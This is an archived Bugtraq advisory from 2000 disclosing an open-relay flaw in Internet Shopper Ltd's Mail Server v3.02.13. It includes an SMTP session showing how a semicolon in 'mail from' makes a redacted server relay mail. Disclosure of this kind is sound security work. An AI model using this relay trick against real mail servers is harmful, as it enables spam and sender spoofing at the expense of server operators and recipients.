Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Internet Shopper Ltd's Mail Server Open relay bug.

From: Imran Ghory <ImranG () BTINTERNET COM>
Date: Fri, 15 Sep 2000 20:41:35 +0100
Internet Shopper Ltd's Mail Server Open relay bug.

(I have been unable to make contact with Internet Shopper Ltd, and
as this bug might easily be found accidently I have decide to make
it public)

SUMMARY:

Internet Shopper Ltd's Mail Server can be made to accept and
handle mail for non-local sites.

DETAILS:

Version involved:

Internet Shopper Ltd's Mail Server v3.02.13

No other versions have been tested.

Exploit:

The use of the semi-colon in the "mail from" command will allow
mail to be sent to machine that aren't local.

Exploit in action:

220 mailsvr.xxxxxxxxxx.ac.uk WindowsNT SMTP Server
v3.02.13/32.aap3 ready at Wed, 13 Sep 2000 21:03:39 +0100
helo me
250 mailsvr.xxxxxxxxxx.ac.uk me
mail from;
250 Ok.
rcpt to: ImranG () btinternet com
250 Ok.
data
354 Start mail input, end with <CRLF>.<CRLF>.

Test data
.
250 Requested mail action Ok.
quit
221 Goodbye me

Fix:

None known at this time.

Imran Ghory
Previous By Date Next
Previous By Thread Next

Current thread: